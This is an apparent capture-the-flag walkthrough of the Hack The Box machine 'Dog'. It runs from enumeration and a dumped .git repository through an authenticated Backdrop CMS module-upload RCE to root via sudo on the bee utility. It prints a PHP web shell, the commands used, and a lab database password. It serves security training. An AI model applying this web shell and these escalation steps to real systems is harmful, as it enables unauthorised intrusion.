We use nmap to discover open ports and services. Initially we use only the -sV option along with the -p- option to check for all ports but not make the scan too long by adding additional options.

nmap -sV -p- 10.10.11.58

• -sV : Detect the service and version which is running.
• -p- : Run the scan on all ports

Now that we know that only 2 ports are open, we use the -p option for the 2 ports and the -sC option.

nmap -p22,80 -sV -sC 10.10.11.58

• -sC : Run a default set of NSE scripts to get information about the open services.

SSH Version -> 8.2p1 Ubuntu 4Ubuntu0.12
HTTPD Version -> 2.4.41

We see a git repository was found because of the presence of the .git directory. Also we get a lot of disallowed entries from robots.txt. Lets enumerate these 2 findings next 🙂.

Port 80 looks like a blog page about dogs with a number of posts as well. There is a login page as well but we do not have any credentials for now. There is a username dogBackDropSystem which we will note down for further enumeration if needed. Also we see the domain dog.htb in the ABOUT page which could be useful later on as well.

This CMS seems to be Backdrop CMS as its shown at the bottom of the home page. Maybe we can find some exploits for this CMS ? 🤔
But we don't know the version yet of Backdrop so lets enumerate a bit more for now.

Running gobuster to search for directories did not reveal much other than some paths which were shown in nmap’s robots.txt output.

gobuster dir -u http://10.10.11.58:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

• dir : Uses directory/file enumeration mode
• -u : The target URL
• -w : The wordlist to use

2.1 Git repository enumeration

Since we know there is a git repository hosted in the root of the web page, we can try getting its contents with the git-dumper tool.

git-dumper is used to dump a git repository’s content from a website.

We install git-dumper and run it using the below commands. Do check out the usage of the tool if you would like to see its options.

git clone https://github.com/arthaud/git-dumper.git # Clone git-dumper
cd git-dumper/
mkdir output-dir # Creating a directory for storing the dumped data
pip3 install -r requirements.txt # Install required packages before running
python3 git-dumper.py http://10.10.11.58:80/.git/ output-dir # Get the content and store it in the output-dir

Great, now we have the repository contents of the Backdrop CMS. The structure of the content extracted is similar to the official Github repository of Backdrop. Take a look at the structure of the two below (Extracted on the left VS official github on the right).

We check the extracted content for any useful information and we come across the below information in settings.php. We now have some DB credentials which we can use 🙂.

We try out the below usernames and password on the login page but they do not work out. We still need a valid username for the DB password we have found🫠.

username -> root, dogBackDropSystem , anonymous
password -> BackDropJ2024DS2024

2.2 Backdrop enumeration and login

Part 1 of scratching my head……….

Initially, I had thought that finding the username was not the right way to go and started finding the version for Backdrop.
Since we had the repository information with us, maybe the version will be somewhere there ?

We find the version of backdrop as 1.27.1 🥳. Now lets see if we can find any exploits for this. Searching in google, we find a RCE for this version at exploit-db but it’s an authenticated RCE so we need credentials for it. Back to square 1 we go 🫠.

Part 2 of scratching my head……….

Remember the domain dog.htb which we found earlier. We Ctrl+F for this in our repository extracted content to see if we can find any information and we find [email protected].

We try this email as the username along with password as the DB password and we can login successfully🥳.

Now lets check out the authenticated RCE exploit which we had found earlier.

2.3 Backdrop exploit and Shell

Alright what is the exploit all about ? I have simplified it below:

1. Backdrop lets admins upload ZIP/TAR.GZ files to install new modules using the /admin/modules/install page.
2. These ZIP/TAR.GZ files get extracted into the server’s modules/ folder, but the system doesn’t properly check what’s inside.
3. An attacker can create a fake module that contains a PHP web shell (a hidden script that can run system commands).
4. The attacker uploads this TAR.GZ file, and the CMS installs it like a normal module.
5. Once uploaded, the attacker can visit the web shell URL({BASE_URL}/modules/shell/shell.php?cmd=<>) and run any system command on the server, gaining remote access.

Do read the python script at exploit-db to see how it generates the module and its format and also this linkedin post to summarize how the exploit works 🙂.

Okay, lets use the exploit to generate the module in the shell.tar.gz file. I have modified the php code within the python script to the below:

<?php
if(isset($_GET['cmd'])) {
   system($_GET['cmd']);
}
?>

Next, lets upload this module using the manual installation method in Backdrop.

Alright, now lets go to the URL and execute this PHP code. Great, we have RCE 🫡.

The shell module which we installed seems to keep being deleted and we have time to only run 1 command after which we have to reupload the module again(See the POST ROOT BONUS 5.1 section at the end to see why the module keeps getting deleted😉).

So we take the below reverse shell payload and URL encode it and send it as the payload in the cmd GET parameter.

We set up a listener on our machine and we get back a shell as the www-data user 🥳.

3.1 User enumeration and the bee binary

Great, as the www-data user we try enumerating the file system to look for any misconfigurations or privilege escalation vectors. We find 2 users with the names johncusack and jobert. The 1st user has the user.txt flag but we need to escalate privileges to the johncusack user first.

When we are going through the file system, we find an interesting directory in /backdrop_tool/bee . This seems to be referring to the bee command line utility present in the github repo here.

Bee is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites.

The bee utility has a option of running php code and scripts which is interesting but its not very useful at the moment because we are still running as the www-data user. Lets park this for now and see if it is useful later on 🤔.

3.2 Privilege escalation and user.txt

We run linpeas.sh and don't find anything relevant which we can use to privilege escalate. Again it seems like a dead end on the www-data user so I stepped back and tried the previous root database password on the 2 new usernames which we had found earlier.

Bingo! We successfully login with johncusack user 🥳.

Ideally, we now have to find a way to escalate our privileges to the jobert or the root user. Before that lets get our user.txt flag.

user.txt -> d4937***************************

Lets try to escalate our privileges to root. As the johncusack user, running sudo -l gives us the below output:

Ahh the bee comes back to sting us again🫡.

We can run the bee command as any user (ALL) and any group (ALL) using sudo . Let us see if we can run php commands using the root user.

Running the below commands using sudo did not work due to an error. Maybe bee is not able to find the backdrop installation which it needs ? 🤔

We move to the /var/www/html directory where backdrop is hosted and we run the id command to check if we are root and it works.

We can use the php-script command of bee to directly run a php script instead of running commands from the command line. We put a bash reverse shell payload inside shell.php and run it using bee.

# Get shell.php from local machine
scp shell.php [email protected]:/tmp 
# Run the shell.php as a root user using the bee utility
sudo bee php-script /tmp/shell.php 

We get a shell as the root user and can read the root.txt🥳.

root.txt -> d4857***************************